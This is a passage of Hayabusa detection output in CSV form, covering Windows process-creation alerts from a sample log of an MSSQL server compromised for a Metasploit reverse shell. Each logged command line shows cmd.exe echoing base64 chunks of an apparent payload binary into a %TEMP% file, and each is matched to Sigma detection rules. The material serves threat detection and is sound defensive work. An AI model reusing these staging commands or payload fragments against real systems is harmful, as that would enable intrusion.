QABo4OtAAO7CQFL/u6HIzkAAg8RAg8BAaPTqQGlQs9aDxAj0Fv8VcLTqAP6QkDSQ/otlUaFMQEEAU4tdCNRXU1DodBIACaNAQEHSi/uDyf8zwB2u2Xo0wRAA99FJg/kHD3DXAAAAagdo2PJAAO3/1oPEDIXAY4XCfwAAx8NEai+/YxV8wUAAg8QIiUUIhcCmhFIBAACL8KxpQEEAKPONVgFSUOiIBKwArc6L86DRi/jBnAKLpYvKg/kD86SLZQiLyCsMxgQx24sVTEBBAFIpjd38aPQXQbFQaAAYQQC/DiieVu/AD4X9AO0Aoc0YPniFwA+E8AAAl4tF/IXAD4UDAAAAZQ20QFcAYFHwERIAAKPkF0EAxgYAEjtbdWuLFQAYQZ0tamC/AFJo0PJAAFD/iw8AOYPEDKOcC0EA61aLDYPJ/zPA8q73kUmD+QgPhqv///9qCFTE8lQAU//Wg+8MhcAPFxd2/2r1DcjAQACYnPKFAIPBxVn/FYDBQACDxAhqAa/ccMFAAIsNvBgYAIkNnAtB6mah9BdBAGaFwHUcZscm9ElBAIoAX17HBYMLigC/AkEAM/2CLuVdw2Y9UAB05zM8ZovQoUxAQQBSaFvyHO5Q6MoNACqDxAyjrAtBADPUX3Eozu1dw+deuJkAZwBbJOUs3JCQkJCQkJAoB5CQ2ZB7MOyl7NhN9AChTEBBo1ZXi7gIUGj/DwAyagGTTQhXUeirTAAAi/Ag9nQtjTSIalNSVs55PwBBUKHIwDcAV4NPWmhg860AUP8VYcFAAIPEEIvGkl6LflbDi5sI8pUo////UWhwsXMAGuhDB50Ai/CF9tgujUWIamx8Vuj4PwAAiw3IwEAAN1eDwUBoNFJAZVH/K4DBQACDxBCLEF9ei+XYpYuFOf///1CjcPhaABoQXMHpAIMoBKMgOEEAtcBfI4sVyMBAgmgI80AAg8RAUv8VtcFAAHGy87gMACZBc16L5V3Diw1wAkEli1UIajeYYFJFO1AAAIvwhfbgLY1FiGp4UI3oqZoAAIsNyMBAAEeDbUDZ4PJAAFFvFa0iQACDxAyLxl9eauVdw4tVCGnov08AAF8zwF6LfV3ykJCQkJCQ8VWL7FaLdUVqaMcGACQAABP3XMFAAIvQg8QE/9J1CrhgAAAAkl3C0gANLxoAAAAzNov6sas9Qm2JAV9eXcIEAPxVSuyLADVTVleLPTDBQACNcMs5FAAAAIsGGvd0EIsIUIkO/9eLuoPEZ4XA7/CDxgRLdeSLVQjO/9eDxK0LXltdwgQAkJCkWJCQgpCQkJCQ9FWL7ItNCItFDIlBK13CCN66beyLRQiLQAz2wgQAkJA6VYvsi00Ii0UMiUFUXcIIAFWL7ItFCItAEDzCBACrkJBli+xRoNgCQQBWisj+wITJ8tgC6QAPhbAAAABo4AJBAOgL////hcB0DMYF2AKlNwBei+Vdw/EV4AJBAFJqcWoAaNwt>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.833 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.835 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QQDWYwVVAHXwhcotI6HgAkEAUOgVnP//i8bHBeACQQAAAEOyxgXYApgAAHCL5V3Diw3cAkEABYzzQABRJiwMAACCFdwCcQBS6I9ZLACFwHU5odwCQQCNTfxXaotR6NxXYACFWXW2iyH8oeCLQQD3UI8Ifv//iw3cAtMA2RU1AkELUVLoFf//hTPAXr7lXaWQkNaQMvhnzJC6kIpkkKDYAooAhIl0KP7IotgCQQB1H6HcAkEAUOjDAwAAxwWvAkEAAAAAAMcF4AKlAAAAAADDkGyQkJCQzJANUvuQkPFVi7OD7AyLRQxTjVeNUKeD4i470ItFCIlV+HMdnEAghcCRhEYCIQBqDP/qg8QEM8BfvFuL5V3eCACLuiyLThCL0RQr5b9PAhAD0V+JVhBei5Fbi3NdeQgAiwCLERSLWRAr+zvXdxmLQT6LOYk4iwH3eQSJeJXpcAbyAIt4GI2aFxAAAIHjAPD/EzvaiV0MD4LLAQAAovsAYQAAc87HkAwAIAAAIF0Mi9PB6gxNg/r/iVX8D4cdAQAAOzp7h4VJyACLRwyFwCnJs+hyVwAAi+X8i1yXFIsPjUQlFIWZ+A870bYLi1gEg8AEQoXbdDmLp4XbiV30dH9PG4Xb7AF1FTvRchGL0/yDeQRJzNJ1BNDJ2vGJD4td9ItHCFVLaQMViUcIi8iLR9I7yHYDiUf8i+wMd/90BlfopqH1rI1TGIlTEOmaogA6i0cUhUN0OYtHDBDAdAZQOhdXAACLXxQ6RxSF2zoSi038i1MIO0d2SIvDixuF23Xui38MutJ0BlfodFcYtYtzDFP/eFzBQCmDxASFNg+ExQAAPItV/I09GIlQCI0UGInhEFMAANIAAIlQFIvI6zSLE4kQi0Mri38IA8jtRwQ7yIlPinZciUcIi38Mhf90BlejB1cAII1LGIlLEMcDAEAAAIvLi1X4/0Ezx0EMub8AADHQifBPaFYEiVFYiQo9VQiJOolOBIlKLItOFIt+ayvPiz6BwQAQAACL14HhR/D//0nB+QyJTgyLWgw7y3P/ixI7Sihy+YvABIk5iw6LfgSJeQRySgSJTgRrMYmg+XJ7ll6W/OU6wj6ji+MI62oghQ7gB2oM/+6DxARfXjPAW4vlFsIIAHiQipCQkKyQVWzsuWoMU1ZXi30IeXc4M+j7XwAAi0cEM4GDxAQ7w4mJiQI8dA1Q6PQAAACkRwQ7w3XzjXdvVujUCQAAkt8cKh5QmF8U6Aa0AADvRzCLWjSJXxyJySSJRyyJSBCLeFzECDvIiUX084SpAACei1AE/BqLf5iL5otHDIXAdAZQhW10AACLB4tPBItXCInDCFDG/LITi038iUX4i0YIhcl0msvsdgaJHove6y+D+BRUGItMwxuF8okOdQg7RQh2A7ZFCIl06xTr/Is4J4kOiXcUO9ByBCt26wIz0ot1+IX2dbGLnwh0IAiJB1p/6oX/UwZX6GtVAACF>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.106 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.109 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.380 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.382 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 0FcEEg+JVWOLVwiJTQyLBotN/IniYotGCIXJdAo7wlQGiR6L3usvg/gUcwWL5JgUn8mJQYkIO0UMdkyJRaGJdIcU6wiLTxTIDol3FDvQcgQr0DZ3UNKL1viFBXWxi0UMnVcIiQeLfwyF/3QGV+iJUAAAhb50FIs1MNbYh90+ixt2/9b7xASF9jjyizQQi30IikXwhMB1C19ei8KOi+VdwgwAoU3oi0csxzUMAFoAFYtQXYlRBIkKiQGJSATvTyyLSBTwihCLMNoZ+sEAgQEAi9aB4fPw//9JwcYMiUgMi8kwO89zsYsdOxUMcl6LSASJMYsI4XAEiXEEi0oEifYEiQGJENRCBItFEI5eWz9VXcLuAJCQkJCQVULsg+yri1UTU1ZXi1oIoAL3egwrQzaJRfSNDFCD6yBzBbkgAAAAgHoQAIvBdfWLiRQrcBA7SXdxi0IEUDCJMXsIi3CoiXEEi0tYiUgEiQGJGIlDBMe4DE4AAMyJjCyLmOKLS5SLMyvBM84FAB0A4CUA8P//SMH4DDZDDF/VUXMhiwk7QQzk+YtDBIkwiwOLc1CJcASLQQSJQwSJ7IkTiVlti0cs6VoAAACLdxgrgRcQAAAlAPD//zvBiUX8D4K1AWAAPRcgAABzCoxF/AAgIgA3Rfzy+MHvDE+D//+JffgPh5oBFQA7OxuHK/oAAItGDIXAdAZQ6JVOAACDfBoUAIsajURgFIubTFX1OBA70XMJWsAEvoM4ZHTziVX4ixDf0olV8I6+nAAA8os6hRw5OHUWOU34chGLePyD6BtJhf91BIXJd7iJDotKCItGCAPBiUahixOLMMmnyJsDiUabi3YMhfZ0CRQulIQAwovs8I1CGMcCAAAAAIlCEIvJix4IikoQocl0CIsRFD/OFFoUxkIQAYtNgYtzENx4EIvZwekC8xexy4PhA/OkiUIIi0gwi/NfA87qiQqLQBRIW4lCBDPAi+W1w4uWDIXtdElW6FQaAAD3QYtOFIXJdD2LRvOFcHQJUOinTQAAi1UIV34UjUYUhf90EIsQ+DtPCHboi8eLP4X/dfCLdgyF9nQGVujtTUu0i31Ki0UqUDImXFtAAMPE6OHAdFmLt/y3UBiJUBDHPwAPAACNFAiJeAiJUBTpOSr//4uqKAiLRwiLTggDyEtGBDvIiU4IdgNtRgiLdgyF43QJVtP6TRkAi1UIjk8YxyB1JQAAiU8Qi8fGAP///+Beg8j/W4vlXcPBkN7lPUZV+3KLTd+LVQiNRRBQUVLofHHt/13DkJCQd5AokJCQkFWL7ItNCItFDIlBKF3CCACwi+wii3UIhSR0MH1GFIW9dAeLCIkgbusIaulW6D/0/wzsVQyLTZeJggSLVRSJSMvHUAyLThB3D8pGfWRdLhAAVYvsi1UIU1ZXhdJ0X4tCEIt1EIt9oo25EIXAdCA5eAR1BXxwCHSai8iLzYXAde7rDIsYiaOLShSJCIlR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.653 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.656 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLfgSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgVW5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.927 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:14.929 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo //+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.201 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.203 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:15.474 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iwQ3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: 